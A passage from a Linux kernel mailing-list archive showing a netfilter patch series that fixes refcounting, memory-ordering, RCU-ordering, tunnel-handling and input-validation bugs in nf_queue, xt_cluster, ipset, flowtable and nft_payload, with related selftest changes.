@@ -84,6 +85,8 @@ static void __nf_queue_entry_init_physdevs(struct nf_queue_entry *entry)
 {
 #if IS_ENABLED(CONFIG_BRIDGE_NETFILTER)
 	const struct sk_buff *skb = entry->skb;
+	struct dst_entry *dst = skb_dst(skb);
+	struct net_device *dev = NULL;
 
 	if (nf_bridge_info_exists(skb)) {
 		entry->physin = nf_bridge_get_physindev(skb, entry->state.net);
@@ -92,6 +95,16 @@ static void __nf_queue_entry_init_physdevs(struct nf_queue_entry *entry)
 		entry->physin = NULL;
 		entry->physout = NULL;
 	}
+
+	if (entry->state.pf == NFPROTO_BRIDGE &&
+	    dst && (dst->flags & DST_FAKE_RTABLE))
+		dev = dst_dev_rcu(dst);
+
+	/* Must hold a reference on the bridge device: dst_hold() protects
+	 * the dst itself, but the fake rtable is embedded in bridge-private
+	 * storage that netdevice teardown can free independently.
+	 */
+	entry->bridge_dev = dev;
 #endif
 }
 
@@ -108,6 +121,7 @@ bool nf_queue_entry_get_refs(struct nf_queue_entry *entry)
 	dev_hold(state->out);
 
 #if IS_ENABLED(CONFIG_BRIDGE_NETFILTER)
+	dev_hold(entry->bridge_dev);
 	dev_hold(entry->physin);
 	dev_hold(entry->physout);
 #endif
diff --git a/net/netfilter/nfnetlink_queue.c b/net/netfilter/nfnetlink_queue.c
index c5e29fec419b..80ca077b81bd 100644
--- a/net/netfilter/nfnetlink_queue.c
+++ b/net/netfilter/nfnetlink_queue.c
@@ -1262,6 +1262,9 @@ dev_cmp(struct nf_queue_entry *entry, unsigned long ifindex)
 
 	if (physinif == ifindex || physoutif == ifindex)
 		return 1;
+
+	if (entry->bridge_dev && entry->bridge_dev->ifindex == ifindex)
+		return 1;
 #endif
 	if (entry->skb_dev && entry->skb_dev->ifindex == ifindex)
 		return 1;
-- 
2.47.3


^ permalink raw reply related

* [PATCH net 03/14] netfilter: xt_cluster: reject template conntracks in hash match
From: Pablo Neira Ayuso @ 2026-06-20 22:27 UTC (permalink / raw)
  To: netfilter-devel; +Cc: davem, netdev, kuba, pabeni, edumazet, fw, horms
In-Reply-To: <20260620222738.112506-1-pablo@netfilter.org>

From: Wyatt Feng <bronzed_45_vested@icloud.com>

xt_cluster_mt() treats any non-NULL nf_ct_get() result as a fully
initialized conntrack and passes it to xt_cluster_hash().

This causes a state confusion bug when the raw table CT target attaches
a template conntrack to skb->_nfct before normal conntrack processing.
Templates carry IPS_TEMPLATE status but do not have a valid tuple for
hashing yet, so xt_cluster_hash() can hit its WARN_ON() path on the
zeroed l3num field.

Reject template conntracks before hashing them. This matches existing
netfilter handling for template objects and avoids hashing incomplete
conntrack state.

Fixes: 0269ea493734 ("netfilter: xtables: add cluster match")
Cc: stable@vger.kernel.org
Reported-by: Yuan Tan <yuantan098@gmail.com>
Reported-by: Yifan Wu <yifanwucs@gmail.com>
Reported-by: Juefei Pu <tomapufckgml@gmail.com>
Reported-by: Zhengchuan Liang <zcliangcn@gmail.com>
Reported-by: Xin Liu <bird@lzu.edu.cn>
Assisted-by: Codex:GPT-5.4
Signed-off-by: Wyatt Feng <bronzed_45_vested@icloud.com>
Signed-off-by: Ren Wei <n05ec@lzu.edu.cn>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
---
 net/netfilter/xt_cluster.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/net/netfilter/xt_cluster.c b/net/netfilter/xt_cluster.c
index 908fd5f2c3c8..eaf2511d63f0 100644
--- a/net/netfilter/xt_cluster.c
+++ b/net/netfilter/xt_cluster.c
@@ -107,7 +107,7 @@ xt_cluster_mt(const struct sk_buff *skb, struct xt_action_param *par)
 	}
 
 	ct = nf_ct_get(skb, &ctinfo);
-	if (ct == NULL)
+	if (!ct || nf_ct_is_template(ct))
 		return false;
 
 	if (ct->master)
-- 
2.47.3


^ permalink raw reply related

* [PATCH net 06/14] netfilter: ipset: Don't use test_bit() in lockless RCU readers in bitmap types
From: Pablo Neira Ayuso @ 2026-06-20 22:27 UTC (permalink / raw)
  To: netfilter-devel; +Cc: davem, netdev, kuba, pabeni, edumazet, fw, horms
In-Reply-To: <20260620222738.112506-1-pablo@netfilter.org>

From: Jozsef Kadlecsik <kadlec@netfilter.org>

The pair of the patch "netfilter: ipset: Don't use test_bit() in lockless
RCU readers in hash types" for the bitmap types.

Fixes: 02a3231b6d82 ("netfilter: nf_conntrack_expect: store netns and zone in expectation")
Fixes: b0da3905bb1e ("netfilter: ipset: Bitmap types using the unified code base")
Signed-off-by: Jozsef Kadlecsik <kadlec@netfilter.org>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
---
 net/netfilter/ipset/ip_set_bitmap_gen.h   | 4 +++-
 net/netfilter/ipset/ip_set_bitmap_ip.c    | 2 +-
 net/netfilter/ipset/ip_set_bitmap_ipmac.c | 2 +-
 net/netfilter/ipset/ip_set_bitmap_port.c  | 2 +-
 4 files changed, 6 insertions(+), 4 deletions(-)

diff --git a/net/netfilter/ipset/ip_set_bitmap_gen.h b/net/netfilter/ipset/ip_set_bitmap_gen.h
index 798c7993635e..bb9b5bed10e1 100644
--- a/net/netfilter/ipset/ip_set_bitmap_gen.h
+++ b/net/netfilter/ipset/ip_set_bitmap_gen.h
@@ -165,6 +165,7 @@ mtype_add(struct ip_set *set, void *value, const struct ip_set_ext *ext,
 		ip_set_init_skbinfo(ext_skbinfo(x, set), ext);
 
 	/* Activate element */
+	smp_mb__before_atomic();
 	set_bit(e->id, map->members);
 	set->elements++;
 
@@ -219,7 +220,7 @@ mtype_list(const struct ip_set *set,
 		cond_resched_rcu();
 		id = cb->args[IPSET_CB_ARG0];
 		x = get_ext(set, map, id);
-		if (!test_bit(id, map->members) ||
+		if (!test_bit_acquire(id, map->members) ||
 		    (SET_WITH_TIMEOUT(set) &&
 #ifdef IP_SET_BITMAP_STORED_TIMEOUT
 		     mtype_is_filled(x) &&
@@ -278,6 +279,7 @@ mtype_gc(struct timer_list *t)
 			x = get_ext(set, map, id);
 			if (ip_set_timeout_expired(ext_timeout(x, set))) {
 				clear_bit(id, map->members);
+				smp_mb__after_atomic();
 				ip_set_ext_destroy(set, x);
 				set->elements--;
 			}
diff --git a/net/netfilter/ipset/ip_set_bitmap_ip.c b/net/netfilter/ipset/ip_set_bitmap_ip.c
index 5988b9bb9029..ac7febce074f 100644
--- a/net/netfilter/ipset/ip_set_bitmap_ip.c
+++ b/net/netfilter/ipset/ip_set_bitmap_ip.c
@@ -67,7 +67,7 @@ static int
 bitmap_ip_do_test(const struct bitmap_ip_adt_elem *e,
 		  struct bitmap_ip *map, size_t dsize)
 {
-	return !!test_bit(e->id, map->members);
+	return !!test_bit_acquire(e->id, map->members);
 }
 
 static int
diff --git a/net/netfilter/ipset/ip_set_bitmap_ipmac.c b/net/netfilter/ipset/ip_set_bitmap_ipmac.c
index 752f59ef8744..5921fd9d2dca 100644
--- a/net/netfilter/ipset/ip_set_bitmap_ipmac.c
+++ b/net/netfilter/ipset/ip_set_bitmap_ipmac.c
@@ -86,7 +86,7 @@ bitmap_ipmac_do_test(const struct bitmap_ipmac_adt_elem *e,
 {
 	const struct bitmap_ipmac_elem *elem;
 
-	if (!test_bit(e->id, map->members))
+	if (!test_bit_acquire(e->id, map->members))
 		return 0;
 	elem = get_const_elem(map->extensions, e->id, dsize);
 	if (e->add_mac && elem->filled == MAC_FILLED)
diff --git a/net/netfilter/ipset/ip_set_bitmap_port.c b/net/netfilter/ipset/ip_set_bitmap_port.c
index 7138e080def4..ca875c982424 100644
--- a/net/netfilter/ipset/ip_set_bitmap_port.c
+++ b/net/netfilter/ipset/ip_set_bitmap_port.c
@@ -58,7 +58,7 @@ static int
 bitmap_port_do_test(const struct bitmap_port_adt_elem *e,
 		    const struct bitmap_port *map, size_t dsize)
 {
-	return !!test_bit(e->id, map->members);
+	return !!test_bit_acquire(e->id, map->members);
 }
 
 static int
-- 
2.47.3


^ permalink raw reply related

* [PATCH net 05/14] netfilter: ipset: Don't use test_bit() in lockless RCU readers in hash types
From: Pablo Neira Ayuso @ 2026-06-20 22:27 UTC (permalink / raw)
  To: netfilter-devel; +Cc: davem, netdev, kuba, pabeni, edumazet, fw, horms
In-Reply-To: <20260620222738.112506-1-pablo@netfilter.org>

From: Jozsef Kadlecsik <kadlec@netfilter.org>

Sashiko pointed out that there are a few lockless RCU readers
using test_bit() which is a relaxed atomic operation and
provides no memory barrier guarantees. Use test_bit_acquire()
instead where the operation may run parallel with add/del/gc,
i.e. is not one from the next cases

- protected by region lock
- in a set destroy phase
- in a new/temporary set creation phase

Fixes: 18f84d41d34f ("netfilter: ipset: Introduce RCU locking in hash:* types")
Signed-off-by: Jozsef Kadlecsik <kadlec@netfilter.org>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
---
 net/netfilter/ipset/ip_set_hash_gen.h | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/net/netfilter/ipset/ip_set_hash_gen.h b/net/netfilter/ipset/ip_set_hash_gen.h
index 04e4627ddfc1..00c27b95207f 100644
--- a/net/netfilter/ipset/ip_set_hash_gen.h
+++ b/net/netfilter/ipset/ip_set_hash_gen.h
@@ -689,7 +689,7 @@ mtype_resize(struct ip_set *set, bool retried)
 				continue;
 			pos = smp_load_acquire(&n->pos);
 			for (j = 0; j < pos; j++) {
-				if (!test_bit(j, n->used))
+				if (!test_bit_acquire(j, n->used))
 					continue;
 				data = ahash_data(n, j, dsize);
 				if (SET_ELEM_EXPIRED(set, data))
@@ -826,7 +826,7 @@ mtype_ext_size(struct ip_set *set, u32 *elements, size_t *ext_size)
 				continue;
 			pos = smp_load_acquire(&n->pos);
 			for (j = 0; j < pos; j++) {
-				if (!test_bit(j, n->used))
+				if (!test_bit_acquire(j, n->used))
 					continue;
 				data = ahash_data(n, j, set->dsize);
 				if (!SET_ELEM_EXPIRED(set, data))
@@ -1201,7 +1201,7 @@ mtype_test_cidrs(struct ip_set *set, struct mtype_elem *d,
 			continue;
 		pos = smp_load_acquire(&n->pos);
 		for (i = 0; i < pos; i++) {
-			if (!test_bit(i, n->used))
+			if (!test_bit_acquire(i, n->used))
 				continue;
 			data = ahash_data(n, i, set->dsize);
 			if (!mtype_data_equal(data, d, &multi))
@@ -1259,7 +1259,7 @@ mtype_test(struct ip_set *set, void *value, const struct ip_set_ext *ext,
 	}
 	pos = smp_load_acquire(&n->pos);
 	for (i = 0; i < pos; i++) {
-		if (!test_bit(i, n->used))
+		if (!test_bit_acquire(i, n->used))
 			continue;
 		data = ahash_data(n, i, set->dsize);
 		if (!mtype_data_equal(data, d, &multi))
@@ -1396,7 +1396,7 @@ mtype_list(const struct ip_set *set,
 			continue;
 		pos = smp_load_acquire(&n->pos);
 		for (i = 0; i < pos; i++) {
-			if (!test_bit(i, n->used))
+			if (!test_bit_acquire(i, n->used))
 				continue;
 			e = ahash_data(n, i, set->dsize);
 			if (SET_ELEM_EXPIRED(set, e))
-- 
2.47.3


^ permalink raw reply related

* [PATCH net 04/14] netfilter: flowtable: fix and simplify IP6IP6 tunnel handling
From: Pablo Neira Ayuso @ 2026-06-20 22:27 UTC (permalink / raw)
  To: netfilter-devel; +Cc: davem, netdev, kuba, pabeni, edumazet, fw, horms
In-Reply-To: <20260620222738.112506-1-pablo@netfilter.org>

From: Lorenzo Bianconi <lorenzo@kernel.org>

Fix nf_flow_ip6_tunnel_proto() to use pskb_may_pull() instead of
skb_header_pointer() to ensure the outer IPv6 header is in the skb
headroom, which is required for subsequent packet processing. Move
ctx->offset update inside the IPPROTO_IPV6 conditional block since it
should only be adjusted when an IP6IP6 tunnel is actually detected.
Simplify the rx path by removing ipv6_skip_exthdr() and checking
ip6h->nexthdr directly, as the flowtable fast path only handles simple
IP6IP6 encapsulation without extension headers.
Drop the tunnel encapsulation limit destination option support from the
tx path to match, since the rx path no longer handles extension headers.
Remove the encap_limit parameter from nf_flow_offload_ipv6_forward(),
nf_flow_tunnel_ip6ip6_push() and nf_flow_tunnel_v6_push(), along with
the ipv6_tel_txoption struct and related headroom/MTU adjustments.

Fixes: d98103575dcdd ("netfilter: flowtable: Add IP6IP6 rx sw acceleration")
Signed-off-by: Lorenzo Bianconi <lorenzo@kernel.org>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
---
 net/ipv6/ip6_tunnel.c                         |  7 ++
 net/netfilter/nf_flow_table_ip.c              | 80 +++++--------------
 .../selftests/net/netfilter/nft_flowtable.sh  |  8 +-
 3 files changed, 30 insertions(+), 65 deletions(-)

diff --git a/net/ipv6/ip6_tunnel.c b/net/ipv6/ip6_tunnel.c
index d7c90a8533ec..bf8e40af60b0 100644
--- a/net/ipv6/ip6_tunnel.c
+++ b/net/ipv6/ip6_tunnel.c
@@ -1851,6 +1851,13 @@ static int ip6_tnl_fill_forward_path(struct net_device_path_ctx *ctx,
 	struct dst_entry *dst;
 	int err;
 
+	if (!(t->parms.flags & IP6_TNL_F_IGN_ENCAP_LIMIT)) {
+		/* encaplimit option is currently not supported is
+		 * sw-acceleration path.
+		 */
+		return -EOPNOTSUPP;
+	}
+
 	dst = ip6_route_output(dev_net(ctx->dev), NULL, &fl6);
 	if (!dst->error) {
 		path->type = DEV_PATH_TUN;
diff --git a/net/netfilter/nf_flow_table_ip.c b/net/netfilter/nf_flow_table_ip.c
index 9c05a50d6013..e7a3fb2b2d94 100644
--- a/net/netfilter/nf_flow_table_ip.c
+++ b/net/netfilter/nf_flow_table_ip.c
@@ -347,29 +347,23 @@ static bool nf_flow_ip6_tunnel_proto(struct nf_flowtable_ctx *ctx,
 				     struct sk_buff *skb)
 {
 #if IS_ENABLED(CONFIG_IPV6)
-	struct ipv6hdr *ip6h, _ip6h;
-	__be16 frag_off;
-	u8 nexthdr;
-	int hdrlen;
+	struct ipv6hdr *ip6h;
 
-	ip6h = skb_header_pointer(skb, ctx->offset, sizeof(*ip6h), &_ip6h);
-	if (!ip6h)
+	if (!pskb_may_pull(skb, sizeof(*ip6h) + ctx->offset))
 		return false;
 
+	ip6h = (struct ipv6hdr *)(skb_network_header(skb) + ctx->offset);
 	if (ip6h->hop_limit <= 1)
 		return false;
 
-	nexthdr = ip6h->nexthdr;
-	hdrlen = ipv6_skip_exthdr(skb, sizeof(*ip6h) + ctx->offset, &nexthdr,
-				  &frag_off);
-	if (hdrlen < 0)
+	if (ipv6_ext_hdr(ip6h->nexthdr))
 		return false;
 
-	if (nexthdr == IPPROTO_IPV6) {
-		ctx->tun.hdr_size = hdrlen;
-		ctx->tun.proto = IPPROTO_IPV6;
+	if (ip6h->nexthdr == IPPROTO_IPV6) {
+		ctx->tun.proto = ip6h->nexthdr;
+		ctx->tun.hdr_size = sizeof(*ip6h);
+		ctx->offset += ctx->tun.hdr_size;
 	}
-	ctx->offset += ctx->tun.hdr_size;
 
 	return true;
 #else
@@ -648,25 +642,19 @@ static int nf_flow_tunnel_v4_push(struct net *net, struct sk_buff *skb,
 	return 0;
 }
 
-struct ipv6_tel_txoption {
-	struct ipv6_txoptions ops;
-	__u8 dst_opt[8];
-};
-
 static int nf_flow_tunnel_ip6ip6_push(struct net *net, struct sk_buff *skb,
 				      struct flow_offload_tuple *tuple,
-				      struct in6_addr **ip6_daddr,
-				      int encap_limit)
+				      struct in6_addr **ip6_daddr)
 {
 	struct ipv6hdr *ip6h = (struct ipv6hdr *)skb_network_header(skb);
-	u8 hop_limit = ip6h->hop_limit, proto = IPPROTO_IPV6;
 	struct rtable *rt = dst_rtable(tuple->dst_cache);
 	__u8 dsfield = ipv6_get_dsfield(ip6h);
 	struct flowi6 fl6 = {
 		.daddr = tuple->tun.src_v6,
 		.saddr = tuple->tun.dst_v6,
-		.flowi6_proto = proto,
+		.flowi6_proto = IPPROTO_IPV6,
 	};
+	u8 hop_limit = ip6h->hop_limit;
 	int err, mtu;
 	u32 headroom;
 
@@ -674,41 +662,18 @@ static int nf_flow_tunnel_ip6ip6_push(struct net *net, struct sk_buff *skb,
 	if (err)
 		return err;
 
-	skb_set_inner_ipproto(skb, proto);
+	skb_set_inner_ipproto(skb, IPPROTO_IPV6);
 	headroom = sizeof(*ip6h) + LL_RESERVED_SPACE(rt->dst.dev) +
 		   rt->dst.header_len;
-	if (encap_limit)
-		headroom += 8;
 	err = skb_cow_head(skb, headroom);
 	if (err)
 		return err;
 
 	skb_scrub_packet(skb, true);
 	mtu = dst_mtu(&rt->dst) - sizeof(*ip6h);
-	if (encap_limit)
-		mtu -= 8;
 	mtu = max(mtu, IPV6_MIN_MTU);
 	skb_dst_update_pmtu_no_confirm(skb, mtu);
 
-	if (encap_limit > 0) {
-		struct ipv6_tel_txoption opt = {
-			.dst_opt[2] = IPV6_TLV_TNL_ENCAP_LIMIT,
-			.dst_opt[3] = 1,
-			.dst_opt[4] = encap_limit,
-			.dst_opt[5] = IPV6_TLV_PADN,
-			.dst_opt[6] = 1,
-		};
-		struct ipv6_opt_hdr *hopt;
-
-		opt.ops.dst1opt = (struct ipv6_opt_hdr *)opt.dst_opt;
-		opt.ops.opt_nflen = 8;
-
-		hopt = skb_push(skb, ipv6_optlen(opt.ops.dst1opt));
-		memcpy(hopt, opt.ops.dst1opt, ipv6_optlen(opt.ops.dst1opt));
-		hopt->nexthdr = IPPROTO_IPV6;
-		proto = NEXTHDR_DEST;
-	}
-
 	skb_push(skb, sizeof(*ip6h));
 	skb_reset_network_header(skb);
 
@@ -716,7 +681,7 @@ static int nf_flow_tunnel_ip6ip6_push(struct net *net, struct sk_buff *skb,
 	ip6_flow_hdr(ip6h, dsfield,
 		     ip6_make_flowlabel(net, skb, fl6.flowlabel, true, &fl6));
 	ip6h->hop_limit = hop_limit;
-	ip6h->nexthdr = proto;
+	ip6h->nexthdr = IPPROTO_IPV6;
 	ip6h->daddr = tuple->tun.src_v6;
 	ip6h->saddr = tuple->tun.dst_v6;
 	ipv6_hdr(skb)->payload_len = htons(skb->len - sizeof(*ip6h));
@@ -729,12 +694,10 @@ static int nf_flow_tunnel_ip6ip6_push(struct net *net, struct sk_buff *skb,
 
 static int nf_flow_tunnel_v6_push(struct net *net, struct sk_buff *skb,
 				  struct flow_offload_tuple *tuple,
-				  struct in6_addr **ip6_daddr,
-				  int encap_limit)
+				  struct in6_addr **ip6_daddr)
 {
 	if (tuple->tun_num)
-		return nf_flow_tunnel_ip6ip6_push(net, skb, tuple, ip6_daddr,
-						  encap_limit);
+		return nf_flow_tunnel_ip6ip6_push(net, skb, tuple, ip6_daddr);
 
 	return 0;
 }
@@ -1089,7 +1052,7 @@ static int nf_flow_tuple_ipv6(struct nf_flowtable_ctx *ctx, struct sk_buff *skb,
 static int nf_flow_offload_ipv6_forward(struct nf_flowtable_ctx *ctx,
 					struct nf_flowtable *flow_table,
 					struct flow_offload_tuple_rhash *tuplehash,
-					struct sk_buff *skb, int encap_limit)
+					struct sk_buff *skb)
 {
 	enum flow_offload_tuple_dir dir;
 	struct flow_offload *flow;
@@ -1100,11 +1063,8 @@ static int nf_flow_offload_ipv6_forward(struct nf_flowtable_ctx *ctx,
 	flow = container_of(tuplehash, struct flow_offload, tuplehash[dir]);
 
 	mtu = flow->tuplehash[dir].tuple.mtu + ctx->offset;
-	if (flow->tuplehash[!dir].tuple.tun_num) {
+	if (flow->tuplehash[!dir].tuple.tun_num)
 		mtu -= sizeof(*ip6h);
-		if (encap_limit > 0)
-			mtu -= 8; /* encap limit option */
-	}
 
 	if (unlikely(nf_flow_exceeds_mtu(skb, mtu)))
 		return 0;
@@ -1158,7 +1118,6 @@ unsigned int
 nf_flow_offload_ipv6_hook(void *priv, struct sk_buff *skb,
 			  const struct nf_hook_state *state)
 {
-	int encap_limit = IPV6_DEFAULT_TNL_ENCAP_LIMIT;
 	struct flow_offload_tuple_rhash *tuplehash;
 	struct nf_flowtable *flow_table = priv;
 	struct flow_offload_tuple *other_tuple;
@@ -1177,8 +1136,7 @@ nf_flow_offload_ipv6_hook(void *priv, struct sk_buff *skb,
 	if (tuplehash == NULL)
 		return NF_ACCEPT;
 
-	ret = nf_flow_offload_ipv6_forward(&ctx, flow_table, tuplehash, skb,
-					   encap_limit);
+	ret = nf_flow_offload_ipv6_forward(&ctx, flow_table, tuplehash, skb);
 	if (ret < 0)
 		return NF_DROP;
 	else if (ret == 0)
@@ -1198,7 +1156,7 @@ nf_flow_offload_ipv6_hook(void *priv, struct sk_buff *skb,
 	ip6_daddr = &other_tuple->src_v6;
 
 	if (nf_flow_tunnel_v6_push(state->net, skb, other_tuple,
-				   &ip6_daddr, encap_limit) < 0)
+				   &ip6_daddr) < 0)
 		return NF_DROP;
 
 	switch (tuplehash->tuple.xmit_type) {
diff --git a/tools/testing/selftests/net/netfilter/nft_flowtable.sh b/tools/testing/selftests/net/netfilter/nft_flowtable.sh
index 7a34ef468975..08ad07500e8a 100755
--- a/tools/testing/selftests/net/netfilter/nft_flowtable.sh
+++ b/tools/testing/selftests/net/netfilter/nft_flowtable.sh
@@ -592,7 +592,7 @@ ip -net "$nsr1" link set tun0 up
 ip -net "$nsr1" addr add 192.168.100.1/24 dev tun0
 ip netns exec "$nsr1" sysctl net.ipv4.conf.tun0.forwarding=1 > /dev/null
 
-ip -net "$nsr1" link add name tun6 type ip6tnl local fee1:2::1 remote fee1:2::2
+ip -net "$nsr1" link add name tun6 type ip6tnl local fee1:2::1 remote fee1:2::2 encaplimit none
 ip -net "$nsr1" link set tun6 up
 ip -net "$nsr1" addr add fee1:3::1/64 dev tun6 nodad
 
@@ -601,7 +601,7 @@ ip -net "$nsr2" link set tun0 up
 ip -net "$nsr2" addr add 192.168.100.2/24 dev tun0
 ip netns exec "$nsr2" sysctl net.ipv4.conf.tun0.forwarding=1 > /dev/null
 
-ip -net "$nsr2" link add name tun6 type ip6tnl local fee1:2::2 remote fee1:2::1 || ret=1
+ip -net "$nsr2" link add name tun6 type ip6tnl local fee1:2::2 remote fee1:2::1 encaplimit none || ret=1
 ip -net "$nsr2" link set tun6 up
 ip -net "$nsr2" addr add fee1:3::2/64 dev tun6 nodad
 
@@ -651,7 +651,7 @@ ip -net "$nsr1" route change default via 192.168.200.2
 ip netns exec "$nsr1" sysctl net.ipv4.conf.tun0/10.forwarding=1 > /dev/null
 ip netns exec "$nsr1" nft -a insert rule inet filter forward 'meta oif tun0.10 accept'
 
-ip -net "$nsr1" link add name tun6.10 type ip6tnl local fee1:4::1 remote fee1:4::2
+ip -net "$nsr1" link add name tun6.10 type ip6tnl local fee1:4::1 remote fee1:4::2 encaplimit none
 ip -net "$nsr1" link set tun6.10 up
 ip -net "$nsr1" addr add fee1:5::1/64 dev tun6.10 nodad
 ip -6 -net "$nsr1" route delete default
@@ -670,7 +670,7 @@ ip -net "$nsr2" addr add 192.168.200.2/24 dev tun0.10
 ip -net "$nsr2" route change default via 192.168.200.1
 ip netns exec "$nsr2" sysctl net.ipv4.conf.tun0/10.forwarding=1 > /dev/null
 
-ip -net "$nsr2" link add name tun6.10 type ip6tnl local fee1:4::2 remote fee1:4::1 || ret=1
+ip -net "$nsr2" link add name tun6.10 type ip6tnl local fee1:4::2 remote fee1:4::1 encaplimit none || ret=1
 ip -net "$nsr2" link set tun6.10 up
 ip -net "$nsr2" addr add fee1:5::2/64 dev tun6.10 nodad
 ip -6 -net "$nsr2" route delete default
-- 
2.47.3


^ permalink raw reply related

* [PATCH net 08/14] netfilter: ipset: make sure gc is properly stopped
From: Pablo Neira Ayuso @ 2026-06-20 22:27 UTC (permalink / raw)
  To: netfilter-devel; +Cc: davem, netdev, kuba, pabeni, edumazet, fw, horms
In-Reply-To: <20260620222738.112506-1-pablo@netfilter.org>

From: Jozsef Kadlecsik <kadlec@netfilter.org>

Sashiko noticed that when destroying a set,
cancel_delayed_work_sync() was called while gc
calls queue_delayed_work() unconditionally which
can lead not to properly shutting down the gc.

Fixes: f66ee0410b1c ("netfilter: ipset: Fix "INFO: rcu detected stall in hash_xxx" reports")
Signed-off-by: Jozsef Kadlecsik <kadlec@netfilter.org>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
---
 net/netfilter/ipset/ip_set_hash_gen.h | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/net/netfilter/ipset/ip_set_hash_gen.h b/net/netfilter/ipset/ip_set_hash_gen.h
index 00c27b95207f..dedf59b661dd 100644
--- a/net/netfilter/ipset/ip_set_hash_gen.h
+++ b/net/netfilter/ipset/ip_set_hash_gen.h
@@ -606,7 +606,7 @@ mtype_cancel_gc(struct ip_set *set)
 	struct htype *h = set->data;
 
 	if (SET_WITH_TIMEOUT(set))
-		cancel_delayed_work_sync(&h->gc.dwork);
+		disable_delayed_work_sync(&h->gc.dwork);
 }
 
 static int
-- 
2.47.3


^ permalink raw reply related

* [PATCH net 07/14] netfilter: ipset: fix order of kfree_rcu() and rcu_assign_pointer()
From: Pablo Neira Ayuso @ 2026-06-20 22:27 UTC (permalink / raw)
  To: netfilter-devel; +Cc: davem, netdev, kuba, pabeni, edumazet, fw, horms
In-Reply-To: <20260620222738.112506-1-pablo@netfilter.org>

From: Jozsef Kadlecsik <kadlec@netfilter.org>

Sashiko pointed out that kfree_rcu() was called before
rcu_assign_pointer() in handling the comment extension.
Fix the order so that rcu_assign_pointer() called first.

Fixes: b57b2d1fa53f ("netfilter: ipset: Prepare the ipset core to use RCU at set level")
Signed-off-by: Jozsef Kadlecsik <kadlec@netfilter.org>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
---
 net/netfilter/ipset/ip_set_core.c | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/net/netfilter/ipset/ip_set_core.c b/net/netfilter/ipset/ip_set_core.c
index 3706b4a85a0f..a531b654b8d9 100644
--- a/net/netfilter/ipset/ip_set_core.c
+++ b/net/netfilter/ipset/ip_set_core.c
@@ -351,8 +351,8 @@ ip_set_init_comment(struct ip_set *set, struct ip_set_comment *comment,
 
 	if (unlikely(c)) {
 		set->ext_size -= sizeof(*c) + strlen(c->str) + 1;
-		kfree_rcu(c, rcu);
 		rcu_assign_pointer(comment->c, NULL);
+		kfree_rcu(c, rcu);
 	}
 	if (!len)
 		return;
@@ -393,8 +393,8 @@ ip_set_comment_free(struct ip_set *set, void *ptr)
 	if (unlikely(!c))
 		return;
 	set->ext_size -= sizeof(*c) + strlen(c->str) + 1;
-	kfree_rcu(c, rcu);
 	rcu_assign_pointer(comment->c, NULL);
+	kfree_rcu(c, rcu);
 }
 
 typedef void (*destroyer)(struct ip_set *, void *);
-- 
2.47.3


^ permalink raw reply related

* [PATCH net 09/14] netfilter: nft_payload: reject offsets exceeding 65535 bytes
From: Pablo Neira Ayuso @ 2026-06-20 22:27 UTC (permalink / raw)
  To: netfilter-devel; +Cc: davem, netdev, kuba, pabeni, edumazet, fw, horms
In-Reply-To: <20260620222738.112506-1-pablo@netfilter.org>

From: Florian Westphal <fw@strlen.de>

Large offsets were rejected based on netlink policy, but blamed commit
removed the policy without updating nft_payload_inner_init() to use the
truncation-check helper.

Silent truncation is not a problem, but not wanted either, so add a
check.

Fixes: 077dc4a27579 ("netfilter: nft_payload: extend offset to 65535 bytes")
Signed-off-by: Florian Westphal <fw@strlen.de>
Reviewed-by: Fernando Fernandez Mancera <fmancera@suse.de>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
---
 net/netfilter/nft_payload.c | 16 +++++++++++++---
 1 file changed, 13 insertions(+), 3 deletions(-)

diff --git a/net/netfilter/nft_payload.c b/net/netfilter/nft_payload.c
index ef2a80dfc68f..345eff140d56 100644
--- a/net/netfilter/nft_payload.c
+++ b/net/netfilter/nft_payload.c
@@ -224,11 +224,17 @@ static int nft_payload_init(const struct nft_ctx *ctx,
 			    const struct nlattr * const tb[])
 {
 	struct nft_payload *priv = nft_expr_priv(expr);
+	u32 offset;
+	int err;
 
 	priv->base   = ntohl(nla_get_be32(tb[NFTA_PAYLOAD_BASE]));
-	priv->offset = ntohl(nla_get_be32(tb[NFTA_PAYLOAD_OFFSET]));
 	priv->len    = ntohl(nla_get_be32(tb[NFTA_PAYLOAD_LEN]));
 
+	err = nft_parse_u32_check(tb[NFTA_PAYLOAD_OFFSET], U16_MAX, &offset);
+	if (err < 0)
+		return err;
+	priv->offset = offset;
+
 	return nft_parse_register_store(ctx, tb[NFTA_PAYLOAD_DREG],
 					&priv->dreg, NULL, NFT_DATA_VALUE,
 					priv->len);
@@ -621,7 +627,8 @@ static int nft_payload_inner_init(const struct nft_ctx *ctx,
 				  const struct nlattr * const tb[])
 {
 	struct nft_payload *priv = nft_expr_priv(expr);
-	u32 base;
+	u32 base, offset;
+	int err;
 
 	if (!tb[NFTA_PAYLOAD_BASE] || !tb[NFTA_PAYLOAD_OFFSET] ||
 	    !tb[NFTA_PAYLOAD_LEN] || !tb[NFTA_PAYLOAD_DREG])
@@ -639,8 +646,11 @@ static int nft_payload_inner_init(const struct nft_ctx *ctx,
 	}
 
 	priv->base   = base;
-	priv->offset = ntohl(nla_get_be32(tb[NFTA_PAYLOAD_OFFSET]));
 	priv->len    = ntohl(nla_get_be32(tb[NFTA_PAYLOAD_LEN]));
+	err = nft_parse_u32_check(tb[NFTA_PAYLOAD_OFFSET], U16_MAX, &offset);
+	if (err < 0)
+		return err;
+	priv->offset = offset;
 
 	return nft_parse_register_store(ctx, tb[NFTA_PAYLOAD_DREG],
 					&priv->dreg, NULL, NFT_DATA_VALUE,
-- 
2.47.3


^ permalink raw reply related

* [PATCH net 10/14] netfilter: nft_meta_bridge: add validate callback for get operations
From: Pablo Neira Ayuso @ 2026-06-20 22:27 UTC (permalink / raw)
  To: netfilter-devel; +Cc: davem, netdev, kuba, pabeni, edumazet, fw, horms
In-Reply-To: <20260620222738.112506-1-pablo@netfilter.org>
